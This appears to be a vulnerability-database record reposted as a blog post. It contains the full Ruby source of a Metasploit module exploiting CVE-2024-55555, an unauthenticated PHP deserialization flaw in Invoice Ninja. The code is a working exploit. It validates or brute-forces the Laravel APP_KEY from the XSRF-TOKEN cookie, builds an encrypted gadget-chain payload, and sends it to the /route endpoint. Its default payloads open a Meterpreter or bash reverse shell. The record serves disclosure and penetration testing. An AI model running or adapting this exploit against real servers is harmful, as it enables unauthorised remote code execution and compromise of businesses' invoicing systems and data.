{“lastseen”:”2025-08-29T19:25:00″,”description”:”Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel. A Remote Code Execution vulnerability…”,”published”:”2025-08-29T18:53:33″,”modified”:”2025-02-25T18:53:10″,”type”:”metasploit”,”title”:”Invoice Ninja unauthenticated PHP Deserialization Vulnerability”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-INVOICENINJA_UNAUTH_RCE_CVE_2024_55555-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-55555″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::LaravelCryptoKiller\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Invoice Ninja unauthenticated PHP Deserialization Vulnerability’,\\n ‘Description’ =\\u003e %q{\\n Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel.\\n A Remote Code Execution vulnerability in Invoice Ninja (\\u003e= 5.8.22 \\u003c= 5.10.10) allows remote unauthenticated\\n attackers to conduct PHP deserialization attacks via endpoint `\/route\/\\u003chash\\u003e` which accepts a Laravel\\n ciphered value which is unsafe unserialized, if an attacker has access to the APP_KEY.\\n As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,\\n potentially resulting in complete system compromise, data exfiltration, or unauthorized access\\n to sensitive information.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die-gr3y \\u003ch00die.gr3y[at]gmail.com\\u003e’, # MSF module contributor\\n ‘R\u00e9mi Matasse’, # SynActiv Research Team – discovery of the vulnerability\\n ‘Micka\u00ebl Benassouli’ # SynActiv Research Team – discovery of the vulnerability\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-55555’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/QtMS7cIExH\/cve-2024-55555’],\\n [‘URL’, ‘https:\/\/www.synacktiv.com\/advisories\/invoiceninja-unauthenticated-remote-command-execution-when-appkey-known’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2024-12-13’,\\n ‘Platform’ =\\u003e [‘php’, ‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_PHP, ARCH_CMD],\\n ‘Privileged’ =\\u003e false,\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP’,\\n {\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Type’ =\\u003e :php,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’\\n }\\n }\\n ],\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e true,\\n ‘RPORT’ =\\u003e 443\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [ true, ‘The invoiceninja endpoint URL.’, ‘\/’ ]),\\n OptString.new(‘APP_KEY’, [ true, ‘Laravel APP_KEY.’, ‘base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=’]),\\n OptPath.new(‘BRUTEFORCE’, [false, ‘File with a list of APP_KEYs, one per line for a bruteforce attack.’, nil])\\n ])\\n end\\n\\n def execute_command(cmd, _opts = {})\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘route’, cmd.to_s),\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’\\n })\\n end\\n\\n def check\\n print_status(\\”Checking if #{peer} can be exploited.\\”)\\n res = send_request_cgi!({\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘login’)\\n })\\n return CheckCode::Unknown(‘No valid response received from target.’) unless res\\u0026.code == 200\\n\\n # check if target is running the Invoice Ninja platform\\n # search for the Invoice Ninja X-APP-VERSION within the returned headers from the login page\\n version_number = res.headers[‘X-APP-VERSION’]\\n return CheckCode::Safe(‘No Invoice Ninja platform found.’) if version_number.nil?\\n\\n if Rex::Version.new(version_number).between?(Rex::Version.new(‘5.8.22’), Rex::Version.new(‘5.10.10’))\\n return CheckCode::Appears(\\”Invoice Ninja #{version_number}\\”)\\n end\\n\\n checkCode::Safe(\\”Invoice Ninja #{version_number}\\”)\\n end\\n\\n def exploit\\n # lets first check if decryption is successful with the APP_KEY by decrypting the XSRF_TOKEN inside the cookie.\\n # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier\\n cipher_mode = ‘AES-256-CBC’\\n res = send_request_cgi!({\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘login’)\\n })\\n fail_with(Failure::Unknown, ‘No valid response received from target.’) unless res\\u0026.code == 200\\n\\n print_status(‘Lets check if the APP_KEY(s) is\/are valid by decrypting the XSRF_TOKEN inside the cookie.’)\\n print_status(‘Grabbing the cookie with the XSRF-TOKEN.’)\\n set_cookie = res.get_cookies\\n fail_with(Failure::NotFound, ‘No cookie found.’) if set_cookie.nil?\\n xsrf_token = set_cookie.match(\/XSRF-TOKEN=([^;]+)\/)\\n fail_with(Failure::NotFound, ‘No XSRF-TOKEN found. Unable to check APP_KEY.’) if xsrf_token.nil?\\n\\n if datastore[‘BRUTEFORCE’]\\n key_file = datastore[‘BRUTEFORCE’]\\n print_status(\\”Starting bruteforce decryption with APP_KEYS listed in #{key_file}.\\”)\\n result = laravel_bruteforce_from_file(xsrf_token[1], key_file, cipher_mode)\\n fail_with(Failure::NotFound, \\”Bruteforce decryption failed. No valid APP_KEY found in file #{key_file}.\\”) if result.nil?\\n valid_app_key = result[‘key’]\\n unciphered_value = result[‘value’]\\n else\\n result = laravel_decrypt(xsrf_token[1], datastore[‘APP_KEY’], cipher_mode)\\n fail_with(Failure::BadConfig, \\”Decryption with APP_KEY: #{datastore[‘APP_KEY’]} failed.\\”) if result.nil?\\n valid_app_key = datastore[‘APP_KEY’]\\n unciphered_value = result\\n end\\n print_good(\\”APP_KEY is valid: #{valid_app_key}\\”)\\n print_good(\\”Unciphered value: #{unciphered_value}\\”)\\n\\n print_status(‘Generate an encrypted serialization payload with our cracked APP_KEY.’)\\n pl = payload.encoded\\n pl = \\”php -r \\\\\\”#{payload.encoded.gsub(‘\\”‘, ‘\\\\\\”‘).gsub(‘$’, ‘\\\\$’)}\\\\\\”\\” if target[‘Type’] == :php\\n pl_len = pl.length\\n laravel_payload = %(a:2:{i:7;O:40:\\”Illuminate\\\\\\\\Broadcasting\\\\\\\\PendingBroadcast\\”:1:{s:9:\\”\\\\x00*\\\\x00events\\”;O:35:\\”Illuminate\\\\\\\\Database\\\\\\\\DatabaseManager\\”:2:{s:6:\\”\\\\x00*\\\\x00app\\”;a:1:{s:6:\\”config\\”;a:2:{s:16:\\”database.default\\”;s:6:\\”system\\”;s:20:\\”database.connections\\”;a:1:{s:6:\\”system\\”;a:1:{i:0;s:#{pl_len}:\\”#{pl}\\”;}}}}s:13:\\”\\\\x00*\\\\x00extensions\\”;a:1:{s:6:\\”system\\”;s:12:\\”array_filter\\”;}}}i:7;i:7;})\\n b64_laravel_payload = Base64.strict_encode64(laravel_payload)\\n laravel_cipher = laravel_encrypt(b64_laravel_payload, valid_app_key, cipher_mode)\\n fail_with(Failure::BadConfig, ‘Laravel encryption failed.’) if laravel_cipher.nil?\\n\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n execute_command(laravel_cipher)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/invoiceninja_unauth_rce_cve_2024_55555.rb”,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/invoiceninja_unauth_rce_cve_2024_55555\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:25:00″,”description”:”Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel. A Remote Code Execution vulnerability…”,”published”:”2025-08-29T18:53:33″,”modified”:”2025-02-25T18:53:10″,”type”:”metasploit”,”title”:”Invoice Ninja unauthenticated PHP Deserialization…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-15136","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n